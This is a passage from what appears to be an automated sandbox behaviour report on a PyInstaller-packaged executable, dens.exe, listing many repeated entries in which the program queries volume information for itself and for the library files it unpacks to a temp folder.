            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\typeguard-4.3.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\ucrtbase.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\jaraco VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dens.exeQueries volume information: C:\Users\user\Desktop\dens.exe VolumeInformationJump to behavior
